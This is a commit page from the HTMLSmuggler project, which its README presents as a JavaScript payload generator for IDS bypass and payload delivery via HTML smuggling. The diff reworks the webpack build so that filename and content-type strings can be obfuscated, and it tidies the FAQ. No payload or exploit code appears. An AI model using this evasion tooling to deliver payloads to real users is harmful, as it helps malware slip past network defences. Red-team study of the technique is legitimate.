add: obfuscation for filename and content-type strings

D00Movenok · Jul 6, 2023 · 5a88f12 · 5a88f12
1 parent 567d237
commit 5a88f12
Show file tree

Hide file tree

Showing 6 changed files with 31 additions and 11 deletions.
diff --git a/.eslintrc.js b/.eslintrc.js
@@ -26,8 +26,6 @@ module.exports = {
     "simple-import-sort/exports": "error",
   },
   globals: {
-    FILENAME: true,
-    CONTENTTYPE: true,
     COMPRESS: true,
   },
 };
diff --git a/README.md b/README.md
@@ -1,4 +1,4 @@
-# HTMLSmuggler
+# HTMLSmuggler ✉️
 
 HTMLSmuggler - JS payload generator for IDS bypass and payload delivery via HTML smuggling.
 
@@ -43,11 +43,15 @@ Options:
 
 ## FAQ
 
-Q: I have an error `RangeError: Maximum call stack size exceeded`, how to solve it?
-A: This [issue described here](https://github.com/javascript-obfuscator/javascript-obfuscator/issues/89). To fix it, try to disable `splitStrings` in `obfuscator.js` or make smaller payload (it's recommended to use up to 2 MB payloads because of this issue).
+**Q**: I have an error `RangeError: Maximum call stack size exceeded`, how to solve it?
 
-Q: Why does my payload build so long?
-A: The bigger payload you use, the longer it takes to create a JS file. To decrease time of build, try to disable `splitStrings` in `obfuscator.js`. Below is a table with estimated build times using default `obfuscator.js`.
+**A**: This [issue described here](https://github.com/javascript-obfuscator/javascript-obfuscator/issues/89). To fix it, try to disable `splitStrings` in `obfuscator.js` or make smaller payload (it's recommended to use up to 2 MB payloads because of this issue).
+
+---
+
+**Q**: Why does my payload build so long?
+
+**A**: The bigger payload you use, the longer it takes to create a JS file. To decrease time of build, try to disable `splitStrings` in `obfuscator.js`. Below is a table with estimated build times using default `obfuscator.js`.
 
 | Payload size | Build time |
 | --- | --- |

diff --git a/package.json b/package.json
@@ -23,6 +23,7 @@
     "eslint-plugin-simple-import-sort": "^10.0.0",
     "javascript-obfuscator": "^4.0.2",
     "prettier": "^2.8.8",
+    "string-replace-loader": "^3.1.0",
     "webpack": "^5.88.1",
     "webpack-obfuscator": "^3.5.1"
   },

diff --git a/src/index.js b/src/index.js
@@ -6,5 +6,5 @@ import { download as down } from "./utils";
 export function download() {
   let data = strToU8(payload, true);
   data = COMPRESS ? decompressSync(data) : data;
-  down(data, FILENAME, CONTENTTYPE);
+  down(data, "dont_remove_filename_var", "dont_remove_content_type_var");
 }
diff --git a/webpack.config.js b/webpack.config.js
@@ -18,6 +18,17 @@ module.exports = ({ name, type, compress }) => ({
   },
   module: {
     rules: [
+      // NOTE: used because webpack.DefinePlugin globals obfuscation issues
+      {
+        test: /\.js$/,
+        loader: "string-replace-loader",
+        options: {
+          multiple: [
+            { search: "dont_remove_filename_var", replace: name },
+            { search: "dont_remove_content_type_var", replace: type },
+          ],
+        },
+      },
       {
         test: /assets\/.*/,
         use: "binary-loader",
@@ -34,8 +45,6 @@ module.exports = ({ name, type, compress }) => ({
   },
   plugins: [
     new webpack.DefinePlugin({
-      FILENAME: JSON.stringify(name),
-      CONTENTTYPE: JSON.stringify(type),
       COMPRESS: JSON.stringify(compress),
     }),
   ],

diff --git a/yarn.lock b/yarn.lock
@@ -1728,7 +1728,7 @@ safe-regex-test@^1.0.0:
     get-intrinsic "^1.1.3"
     is-regex "^1.1.4"
 
-schema-utils@^3.1.1, schema-utils@^3.2.0:
+schema-utils@^3.0.0, schema-utils@^3.1.1, schema-utils@^3.2.0:
   version "3.3.0"
   resolved "https://registry.yarnpkg.com/schema-utils/-/schema-utils-3.3.0.tgz#f50a88877c3c01652a15b622ae9e9795df7a60fe"
   integrity sha512-pN/yOAvcC+5rQ5nERGuwrjLlYvLTbCibnZ1I7B1LaiAz9BRBlE9GMgE/eqV30P7aJQUf7Ddimy/RsbYO/GrVGg==
@@ -1795,6 +1795,14 @@ source-map@^0.6.0, source-map@^0.6.1, source-map@~0.6.1:
   resolved "https://registry.yarnpkg.com/source-map/-/source-map-0.6.1.tgz#74722af32e9614e9c287a8d0bbde48b5e2f1a263"
   integrity sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==
 
+string-replace-loader@^3.1.0:
+  version "3.1.0"
+  resolved "https://registry.yarnpkg.com/string-replace-loader/-/string-replace-loader-3.1.0.tgz#11ac6ee76bab80316a86af358ab773193dd57a4f"
+  integrity sha512-5AOMUZeX5HE/ylKDnEa/KKBqvlnFmRZudSOjVJHxhoJg9QYTwl1rECx7SLR8BBH7tfxb4Rp7EM2XVfQFxIhsbQ==
+  dependencies:
+    loader-utils "^2.0.0"
+    schema-utils "^3.0.0"
+
 [email protected]:
   version "1.0.0"
   resolved "https://registry.yarnpkg.com/string-template/-/string-template-1.0.0.tgz#9e9f2233dc00f218718ec379a28a5673ecca8b96"